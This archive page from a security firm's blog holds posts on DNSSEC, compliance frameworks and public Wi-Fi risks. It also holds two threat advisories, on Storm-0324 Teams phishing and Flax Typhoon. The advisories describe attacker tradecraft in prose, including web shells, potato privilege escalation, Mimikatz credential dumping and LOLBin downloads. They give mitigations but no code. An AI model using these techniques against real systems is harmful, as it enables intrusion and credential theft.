Month: September 2023

Categories
General Cyber and IT Security Uncategorized

Understanding DNSSEC and DNS Security

In our increasingly interconnected world, where the digital landscape expands every day, safeguarding our online presence has become vital. One fundamental yet often overlooked aspect of online security is Domain Name System (DNS) security. DNS is the backbone of the internet, responsible for translating domain names into IP addresses that computers can understand. To protect this system from threats, DNS security extensions (DNSSEC) plays a pivotal role.

How DNS Works

DNS Attacks

DNS spoofing and DNS cache poisoning are malicious techniques aimed at manipulating the Domain Name System (DNS) to redirect users to fraudulent websites or compromise network security. DNS spoofing involves forging DNS responses to trick a user’s device into believing it has received legitimate information when, in reality, it’s been directed to a malicious site. This can lead to various security breaches, including phishing attacks. On the other hand, DNS cache poisoning involves corrupting a DNS server’s cache with fraudulent data. Once the cache is poisoned, the server can distribute this tainted information to users, redirecting them to attacker-controlled websites. Both DNS spoofing and cache poisoning are serious threats to the integrity of the DNS infrastructure that highlight the importance of DNSSEC.

DNSSEC

DNSSEC is a suite of extensions to DNS that adds an extra layer of security by digitally signing DNS data. This verification process ensures that the data retrieved from DNS servers is authentic and hasn’t been tampered with by malicious actors. Here’s how it works:

  1. Signing Zone Data: DNSSEC involves signing zone data with cryptographic signatures. Each DNS record in a zone is signed using a private key.
  2. Public Key Distribution: The public key for each zone is published in a DNS record called the Delegation Signer (DS) record. This record is stored in the parent zone, creating a chain of trust. The public key is paired with a private key which is typically stored offline. This creates a digital signature which is published to DNS.
  3. Authentication: When a user’s device queries a DNS server for a domain, the server provides not only the requested data but also the corresponding digital signature. The user’s device uses the public key stored in the DS record to verify the signature’s authenticity.
  4. Validation: If the signature is valid, the DNSSEC client trusts the data it received, knowing it hasn’t been altered during transmission.

How DNSSEC Works:

Benefits of DNSSEC:

  1. Data Integrity: DNSSEC ensures that the DNS data remains unchanged, preventing attackers from redirecting users to malicious websites.
  2. Authentication: It guarantees that the data comes from a legitimate source, reducing the risk of DNS spoofing attacks.
  3. Trust Chain: By establishing a trust chain through DS records, DNSSEC enhances the security of the entire DNS hierarchy.

Challenges with DNSSEC:

While DNSSEC offers robust security, its adoption faces some challenges:

  1. Complex Implementation: DNSSEC implementation can be complex and may require significant effort. However, other DNS providers may offer to enable DNSSEC as part of your DNS package.
  2. Compatibility: Not all DNS servers and clients support DNSSEC, which can lead to compatibility issues.
  3. Key Management: Managing cryptographic keys can be challenging and requires careful consideration.
  4. Increased Packet Size: DNSSEC can result in larger DNS responses, which may impact network performance.

Other DNS Security Options:

DNSSEC is a cornerstone of DNS security, but several other extensions complement it:

  1. DNS-based Authentication of Named Entities (DANE): DANE allows domain owners to associate their TLS certificates with DNS records, improving the security of encrypted connections.
  2. Response Policy Zones (RPZ): RPZ enables DNS servers to block or redirect requests to known malicious domains.
  3. DNS-over-HTTPS (DoH) and DNS-over-TLS (DoT): These protocols encrypt DNS traffic, preventing eavesdropping and manipulation.

In conclusion, DNSSEC is an essential component of our digital defense. DNSSEC provides a robust framework for ensuring the integrity and authenticity of DNS data. The benefits of a more secure and trustworthy internet make the adoption of DNS security extensions a worthy investment in our digital future.

 

Categories
General Cyber and IT Security

The Building Blocks of Cyber Defense: Why Your Business Needs a Cybersecurity Framework

Let’s talk about something that’s as essential to your business as a solid foundation is to a skyscraper: Cybersecurity Frameworks. Trust me, this is the blueprint you didn’t know you needed.

What’s a Cybersecurity Framework and Why It’s Your New BFF?

Think of a cybersecurity framework as your business’s recipe for Grandma’s secret sauce. It’s a step-by-step guide that helps you mix the right ingredients in the right order to cook up some top-notch cybersecurity.  A framework offers a common language that allows businesses to understand, manage, and reduce cybersecurity risks effectively.

  • The Universal Translator: Imagine you’re at a United Nations meeting, but for cybersecurity. A framework is the translator that helps everyone speak the same language, making sure you and your partners are on the same page.
  • The GPS for Your Cyber Journey: It’s like having a GPS that not only tells you how to get from point A to point B but also warns you about roadblocks and speed traps along the way.
  • The Health Checkup: Just like you’d go to a doctor for a health checkup, a cybersecurity framework gives your business a thorough examination to spot any weak points before they become major issues.

Popular Cybersecurity Frameworks  

 1. CIS Controls v8: The Center for Internet Security (CIS) Controls v8 provides a prioritized set of actions to help organizations defend against cyber threats. It is a flexible framework suitable for various industries, emphasizing a risk-based approach.

Industry Applicability: CIS Controls can be applied across various industries, making it a versatile choice. Whether you’re a small business or a large corporation, CIS Controls offers a strong cybersecurity foundation.

Why Choose CIS Controls: CIS Controls are known for their simplicity and effectiveness. They provide actionable steps that organizations can implement to strengthen their cybersecurity posture. Moreover, they are regularly updated to address emerging threats.

2. NIST CSF: The National Institute of Standards and Technology (NIST) Cybersecurity Framework offers guidelines for organizations to improve their cybersecurity posture. It’s especially relevant to critical infrastructure sectors.

Industry Applicability: Critical infrastructure sectors such as energy, healthcare, and finance find the NIST CSF particularly valuable due to its sector-specific adaptation.

Why Choose NIST CSF: NIST CSF is a comprehensive framework that aligns well with industry-specific regulations and standards. It helps organizations identify, protect, detect, respond to, and recover from cybersecurity incidents, making it a holistic choice.

3. NIST 800-0171: NIST 800-0171 safeguards Controlled Unclassified Information (CUI) and is mandated for government contractors. It’s crucial for industries handling sensitive government data.

Industry Applicability: Government contractors, suppliers, and subcontractors dealing with CUI must adhere to NIST 800-171 to maintain government contracts.

Why Choose NIST 800-0171: If your business is involved in government contracting or collaborates with federal agencies, NIST 800-171 is a legal requirement. Implementing this framework ensures compliance and security in handling CUI.

4. CMMC Levels 1 and 2: The Cybersecurity Maturity Model Certification (CMMC) focuses on protecting Controlled Unclassified Information (CUI) within the defense industry supply chain.

Industry Applicability: Mandatory for defense industry contractors handling CUI, CMMC Levels 1 and 2 lay the foundation for robust cybersecurity in this sector.

Why Choose CMMC Levels 1 and 2: If your business is involved in defense contracts or part of the supply chain, compliance with CMMC Levels 1 and 2 is essential for contract eligibility. These levels provide fundamental cybersecurity controls.

5. NIST Security and Privacy Framework (NIST SSDF): NIST SSDF combines security and privacy considerations, helping organizations address both aspects simultaneously.

Industry Applicability: Suitable for organizations prioritizing privacy alongside security, particularly those handling sensitive personal information. Industries such as healthcare and finance benefit from this dual-focus framework.

Why Choose NIST SSDF: NIST SSDF simplifies the integration of security and privacy practices. This framework streamlines compliance efforts and protects customer data in an era of increasing data privacy regulations.

6. ISO 27001/2: ISO 27001 is a globally recognized information security management system (ISMS) standard. It applies to organizations of all sizes and industries.

Industry Applicability: ISO 27001 is versatile and can be implemented by any organization seeking a comprehensive cybersecurity framework. It is often chosen by multinational corporations and organizations seeking a universally recognized certification.

Why Choose ISO 27001: ISO 27001 is renowned for its global recognition and flexibility. It allows organizations to customize their security controls to meet their needs while adhering to international best practices.

7. SOC2: Service Organization Control (SOC) 2 focuses on controls relevant to data security, availability, processing integrity, confidentiality, and customer data privacy.

Industry Applicability: Service providers, including cloud and SaaS companies, commonly adopt SOC 2 to assure clients of their security measures.

Why Choose SOC 2: SOC 2 is crucial for service providers as it builds customer trust. It demonstrates your commitment to protecting their data, making it a competitive advantage in the market.

8. GDPR: The General Data Protection Regulation (GDPR) is a European regulation that governs personal data protection. It applies to organizations processing EU citizens’ data.

Industry Applicability: Essential for organizations handling European customer data or operating in the EU. Industries such as e-commerce, marketing, and healthcare are particularly affected.

Why Choose GDPR: GDPR compliance is not optional if you handle EU data. Non-compliance can result in hefty fines. Implementing GDPR measures also enhances data protection and customer trust.

9. FTC Safeguards Rule: The Federal Trade Commission (FTC) Safeguards Rule applies to financial institutions and requires them to implement security measures to protect consumer information.

Industry Applicability: Financial institutions must adhere to the FTC Safeguards Rule to safeguard customer data.

Why Choose FTC Safeguards Rule: Compliance is a legal obligation for financial institutions. By implementing these safeguards, you meet regulatory requirements and safeguard your customers’ financial information.

10. SEC Compliance: SEC Compliance involves adhering to the Securities and Exchange Commission’s regulations, including cybersecurity disclosure requirements.

Industry Applicability: Essential for publicly traded companies subject to SEC regulations, primarily in the finance and investment sectors.

Why Choose SEC Compliance: SEC compliance ensures transparency and accountability in financial markets. It helps protect investors and maintain the integrity of financial systems.

11. Cyber Essentials: Cyber Essentials is a UK government-backed certification scheme focusing on fundamental cybersecurity practices.

Industry Applicability: Suitable for small to medium-sized businesses seeking a cost-effective cybersecurity framework.

Why Choose Cyber Essentials: If you’re a smaller organization with limited resources, Cyber Essentials offers a practical and affordable way to establish basic cybersecurity measures and build a strong foundation.

12. CCPA: The California Consumer Privacy Act (CCPA) aims to protect the privacy of California residents and applies to organizations handling their personal information.

Industry Applicability: Necessary for businesses dealing with California residents’ data, particularly in the tech and retail sectors.

Why Choose CCPA: CCPA compliance is crucial for companies with a California customer base. It demonstrates a commitment to respecting consumer privacy and avoids costly penalties.

13. HIPAA: The Health Insurance Portability and Accountability Act (HIPAA) Security Rule applies to healthcare organizations handling protected health information (PHI).

Industry Applicability: Mandatory for healthcare providers and entities handling PHI.

Why Choose HIPAA Security: Compliance with HIPAA is a legal requirement and essential for safeguarding sensitive patient information. Non-compliance can result in severe penalties and damage to reputation.

14. PCI-DSS: The Payment Card Industry Data Security Standard (PCI DSS) is a set of security standards designed to ensure that organizations that accept, process, store, or transmit credit card information maintain a secure environment.

Industry Applicability: PCI DSS is particularly relevant to businesses in the retail, e-commerce, hospitality, and financial sectors that handle payment card data. It is essential for any organization that accepts credit card payments.

Why Choose PCI DSS: PCI DSS compliance is not just a best practice but often a contractual requirement enforced by credit card companies. Failure to comply can result in financial penalties and the loss of the ability to process credit card payments. Implementing PCI DSS measures protects sensitive customer data and enhances trust and credibility with customers.

Why You Can’t Afford to Skip This

Imagine you’re building a house. You wouldn’t start without a blueprint, right? Similarly, a cybersecurity framework is your blueprint for building a secure digital environment. It’s not just a nice-to-have; it’s a must-have. Here’s why:

  • Risk Mitigation: Operating without a framework is like driving without a GPS—you’re more likely to end up in a bad neighborhood. A framework helps you identify and prioritize risks, guiding you safely to your destination.
  • Trust Factor: In a world where data breaches make headlines, a recognized framework is your seal of approval. It tells your clients, partners, and stakeholders that you’re serious about security.
  • Regulatory Compliance: A framework is your roadmap to compliance, helping you avoid the pitfalls of hefty fines and legal troubles. It’s like having a lawyer in your pocket, guiding you through the complex legal landscape.
  • Competitive Edge: In a saturated market, a robust cybersecurity posture can set you apart. It’s like having a five-star safety rating in a world of three-star competitors.
  • Cost-Effective Prioritization: Frameworks enable you to allocate your limited resources wisely. It’s like having a financial advisor for your cybersecurity budget, ensuring you get the most bang for your buck.
  • Unified Communication: One of the key benefits of a framework is that it provides a common language for discussing cybersecurity issues. This enhances internal communication and can also improve your interactions with suppliers and partners.

So, a cybersecurity framework isn’t just a set of guidelines; it’s your strategic asset. It’s the VIP pass that not only gets you into the cybersecurity club but also helps you navigate it like a pro. 

Ready to Level Up Your Cybersecurity Game?

By adopting a framework, you’re not just ticking off a compliance checklist; you’re making a strategic business decision. It helps you cut through the noise, focus on what matters, and shows everyone that you’re a business that takes security seriously.

So, if you’re ready to take your cybersecurity to the next level, contact us and let us be your cybersecurity wingman. We offer several services including but not limited to 24/7 SOC monitoring, incident response, compliance assessments, customized program and policy development, pen testing and vulnerability management to fit your unique needs.

Categories
Cybersecurity Advisories

Storm-0324: New Phishing Campaign Targets Corporations via Teams Messages

Microsoft is warning of a new phishing campaign that involves using Teams messages as lures to infiltrate corporate networks. The threat group behind this campaign, tracked as Storm-0324 (aka TA543 and Sagrid), is a financially motivated group known to gain initial access using email-based initial infection vectors and then hand off access to compromised networks to other threat actors, which frequently lead to ransomware deployment. They are known to have deployed Sage and GandCrab ransomware in the past. Additionally, Storm-0324 has also provided the well-known FIN7 (aka Sangria Tempest) cybercrime gang access to corporate networks after compromising them using JSSLoader, Gozi, and Nymaim.

Storm-0324’s methods have changed over the years. As of July 2023, the phishing lures are sent over Teams with malicious links leading to a malicious ZIP file hosted on SharePoint. To accomplish this activity, the group leverages an open-source tool called TeamsPhisher, which is a Python-language program that enables Teams tenant users to attach files to messages sent to external tenants, which can be abused by attackers to deliver phishing attachments. The phishing lures used by threat actors are identified by the Teams platform as “EXTERNAL” users if external access is enabled in the organization. This issue was also previously exploited by APT29 in attacks against dozens of organizations, including government agencies worldwide. Details regarding the end goal of Storm-0324’s attacks have not been provided at this time, however, APT29’s attacks are aimed to steal the targets’ credentials after tricking them into approving MFA prompts.

Microsoft says they are taking these phishing campaigns seriously and have rolled out several improvements to better defend against these threats. They have suspended identified accounts and tenants associated with inauthentic or fraudulent behavior. Microsoft has rolled out enhancements to the Accept/Block experience in one-on-one chats within Teams, to emphasize the externality of a user and their email address so Teams users can better exercise caution by not interacting with unknown or malicious senders. In addition to this, they’ve implemented new restrictions on the creation of domains within tenants and improved notifications to tenant admins when new domains are created within their tenant.

SecurIT360 SOC Managed Services 

If you utilize our SOC Managed Services for MDR and/or EDR, we are actively monitoring the release of IoCs related to this threat actor. Along with standard vendor threat feed and signature updates, we will proactively upload these to our SOC tools if applicable.

As always, if we detect activity related to this campaign, we will alert you if warranted.

Please feel free to contact the SOC via email (soc@securit360.com) or telephone (844-474-1244) if you have any questions or concerns. 

Ongoing Storm-0324 and Sangria Tempest JSSLoader email-based infection chain

Recommendations

As per Microsoft, to harden networks against Storm-0324 attacks, defenders are advised to implement the following:

  • Pilot and start deploying phishing-resistant authentication methods for users.
  • Implement Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
  • Specify trusted Microsoft 365 organizations to define which external domains are allowed or blocked to chat and meet.
  • Keep Microsoft 365 auditing enabled so that audit records could be investigated if required.
  • Understand and select the best access settings for external collaboration for your organization.
  • Allow only known devices that adhere to Microsoft’s recommended security baselines.
  • Educate users about social engineering and credential phishing attacks, including refraining from entering MFA codes sent via any form of unsolicited messages.
    • Educate Microsoft Teams users to verify ‘External’ tagging on communication attempts from external entities, be cautious about what they share, and never share their account information or authorize sign-in requests over chat.
  • Educate users to review sign-in activity and mark suspicious sign-in attempts as “This wasn’t me”.
  • Implement Conditional Access App Control in Microsoft Defender for Cloud Apps for users connecting from unmanaged devices.
  • Configure Microsoft Defender for Office 365 to recheck links on click. Safe Links provides URL scanning and rewriting of inbound email messages in mail flow, and time-of-click verification of URLs and links in email messages, other Microsoft Office applications such as Teams, and other locations such as SharePoint Online. Safe Links scanning occurs in addition to the regular anti-spam and anti-malware protection in inbound email messages in Microsoft Exchange Online Protection (EOP). Safe Links scanning can help protect your organization from malicious links that are used in phishing and other attacks.
  • Enable Zero-hour auto purge (ZAP) in Microsoft Office 365 to quarantine sent mail in response to newly acquired threat intelligence and retroactively neutralize malicious phishing, spam, or malware messages that have already been delivered to mailboxes.
  • Practice the principle of least privilege and maintain credential hygiene. Avoid the use of domain-wide, administrator-level service accounts. Restricting local administrative privileges can help limit installation of RATs and other unwanted applications.
  • Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
  • For additional recommendations on hardening your organization against ransomware attacks, refer to threat overview on human-operated ransomware.

Microsoft customers can turn on attack surface reduction rules to prevent common attack techniques:

Resources & Related Articles

Categories
General Cyber and IT Security

Public Wi-Fi: The Double-Edged Sword of Connectivity and Cybersecurity

The appeal of free public Wi-Fi is inescapable in today’s digital world. The ability to connect, work, and socialize from any location – be it a local café, an airport lounge, or a hotel lobby – is a convenience that many have come to rely on. However, this convenience is not without its risks. As the digital landscape evolves, so do the threats associated with public Wi-Fi networks. Public Wi-Fi has become a staple in our daily lives. With the surge in remote work and the digital nomad lifestyle, the need to stay connected while on the move has never been greater. Yet, a staggering 56% of individuals connect to public Wi-Fi networks without a password, as reported by Forbes Advisor. This seemingly harmless act can expose users to a myriad of cyber threats. 

Below are a few attack vectors that cyber criminals can use to access users’ digital information using public Wi-Fi.

  • Evil Twin (Rogue Access Point) – Cybercriminals often set up counterfeit Wi-Fi networks with an SSID (Service Set Identifier) resembling legitimate ones. Unsuspecting users, thinking they’re connecting to a genuine network, inadvertently expose their data to these rogue hotspots. After a user connects to an Evil Twin, all data sent over the network can be seen by the attacker.
  • Man-in-the-Middle (MITM) Attacks – In these attacks a threat actor, who is on the same public network you connect to, intercepts packets sent between your computer and the internet. Similar to eavesdropping, this allows attackers to view and manipulate data.
  • Session Hijacking and Sidejacking – This occurs when the attacker is able to steal a legitimate session ID from a user to “hijack” the user’s session. For instance, a user may log into their bank account on public Wi-Fi. Simultaneously, the attacker will capture the information in the session cookie and use it to impersonate the user after they are done with their banking activity.
  • Login Page Phishing – Some public Wi-Fi login pages may prompt users to enter information to securely login. This may be leveraged by attackers using a phishing attack to obtain credentials. For example, an attacker may redirect a user attempting to access a public Wi-Fi point to a phishing page requesting the user login through Facebook. If the user enters their Facebook credentials, they are passed to the attacker who can then use them.
  • Unencrypted Public Wi-Fi – By default most access points are set up with WPA2 encryption enabled. However, if encryption is disabled on the Wi-Fi access point, information sent over the network can be viewed by attackers connected to the network.
  • Malware Distribution – Attackers can use public Wi-Fi to prompt a user to download or install a malicious program that may log keystrokes, or enable remote access to a user’s computer.

Public Wi-Fi Best Practices

In most cases, the most secure action would be to avoid public Wi-Fi. A low-cost solution would be to connect to a personal mobile hotspot. However, if one must connect to a public hot spot here are some best practices.

  • Ensure that you are connecting to a legitimate Wi-Fi access point. Usually, this can be confirmed by asking an employee what the SSID for their Wi-Fi is.
  • When connecting to a public Wi-Fi access point, use a VPN to encrypt your data in transit over the network.
  • Disable auto-connecting to Wi-Fi networks.
  • Avoid accessing your personal financial information or work information while using un-trusted public Wi-Fi.
  • Only access HTTPS site to ensure an SSL/TLS connection with the webpage.
  • Enable anti-virus and anti-malware software on your computer.
Categories
Cybersecurity Advisories

Flax Typhoon APT Group Using LOLBins for Cyber Espionage

A China-backed hacking group, tracked as Flax Typhoon, is targeting government agencies and education, critical manufacturing, and information technology organizations likely for espionage purposes. The nation-state actor intends to perform espionage and maintain access to organizations across a broad range of industries for as long as possible. However, final objectives in this campaign have not been observed. Currently, Taiwanese organizations are exclusively being affected, but the scope of attacks aren’t fully known. Microsoft states that the distinctive pattern of malicious activity could be easily reused in other operations outside the region and would benefit from broader industry visibility. Because of this, enterprises beyond Taiwan should be on alert.

Flax Typhoon has been active since mid-2021 and focuses on persistence, lateral movement, and credential access. The threat actors do not primarily rely on malware to gain and maintain access to the victim network, instead, they prefer using mostly components already available on the operating system, LOLBins, and legitimate software. In the campaign observed, Flax Typhoon gained initial access by exploiting known vulnerabilities in public-facing servers, including VPN, web, Java, and SQL applications. The threat actors dropped China Chopper, a powerful web shell that provides remote code execution capabilities. If necessary, the hackers elevate their privileges to administrator level using the publicly available ‘Juicy Potato’ and ‘BadPotato’ open-source tools that exploit known vulnerabilities to obtain higher permissions.

Flax Typhoon establishes persistence by turning off network-level authentication through registry modifications and exploiting the Windows Sticky Keys accessibility feature to set up an RDP connection. To avoid RDP connectivity restrictions of RDP to internal network, Flax Typhoon installs a legitimate VPN bridge to maintain the link between the compromised system and their external server. The attackers download the open-source SoftEther VPN client using LOLBins like PowerShell Invoke-WebRequest utility, certutil, or bitsadmin, and abuse various built-in Windows tools to set the VPN app to launch automatically on system startup. To avoid being detected, the hackers rename it to legitimate Windows components such as ‘conhost.exe’ or ‘dllhost.exe.’ Additionally, Flax Typhoon uses SoftEther’s VPN-over-HTTPS mode to conceal VPN traffic as standard HTTPS traffic.

Researchers have noted that Flax Typhoon frequently uses the Mimikatz tool to extract credentials from LSASS process memory and the SAM registry. The stolen credentials were not observed to extract additional data, making the adversary’s main objective currently unclear.

Flax Typhoon Attack Chain

SecurIT360 SOC Managed Services 

If you utilize our SOC Managed Services, here are the actions we are taking to help detect this activity: 

MDR Services 

  • We utilize several threat feeds that are updated frequently on a daily basis.
  • In addition to our automatic threat feeds, we have added indicators related to known malicious threat actors into our MDR solution, FortiSIEM.

EDR Services 

  • In addition to ongoing vendor IoC updates, we have implemented known IoC information to help with detection. 

Indicators are provided in the Indicators of Compromise section below for your reference.

As always, if we detect activity related to these exploits, we will alert you when applicable. 

Mitigation & Protection

  • Defending against techniques used by Flax Typhoon begins with vulnerability and patch management, particularly on systems and services exposed to the public internet. The credential access techniques used can also be mitigated with proper system hardening.
  • Affected organizations need to assess the scale of Flax Typhoon activity in their network, remove malicious tools and C2 infrastructure, and check logs for signs of compromised accounts that may have been used for malicious purposes.

Recommendations

  • Microsoft recommends organizations to apply the latest security updates to internet-exposed endpoints and public-facing servers, and MFA should be enabled on all accounts.
  • Registry monitoring could help catch modification attempts and unauthorized changes like those performed by Flax Typhoon to disable NLA.

MITRE Summary

T1003 (OS Credential Dumping)
T1003.001 (LSASS Memory)
T1005 (Data from Local System)
T1018 (Remote System Discovery)
T1041 (Exfiltration Over C2 Channel)
T1068 (Exploitation for Privilege Escalation)
T1105 (Ingress Tool Transfer)


IOCS

 

 

 

 

 

 

Resources & Related Articles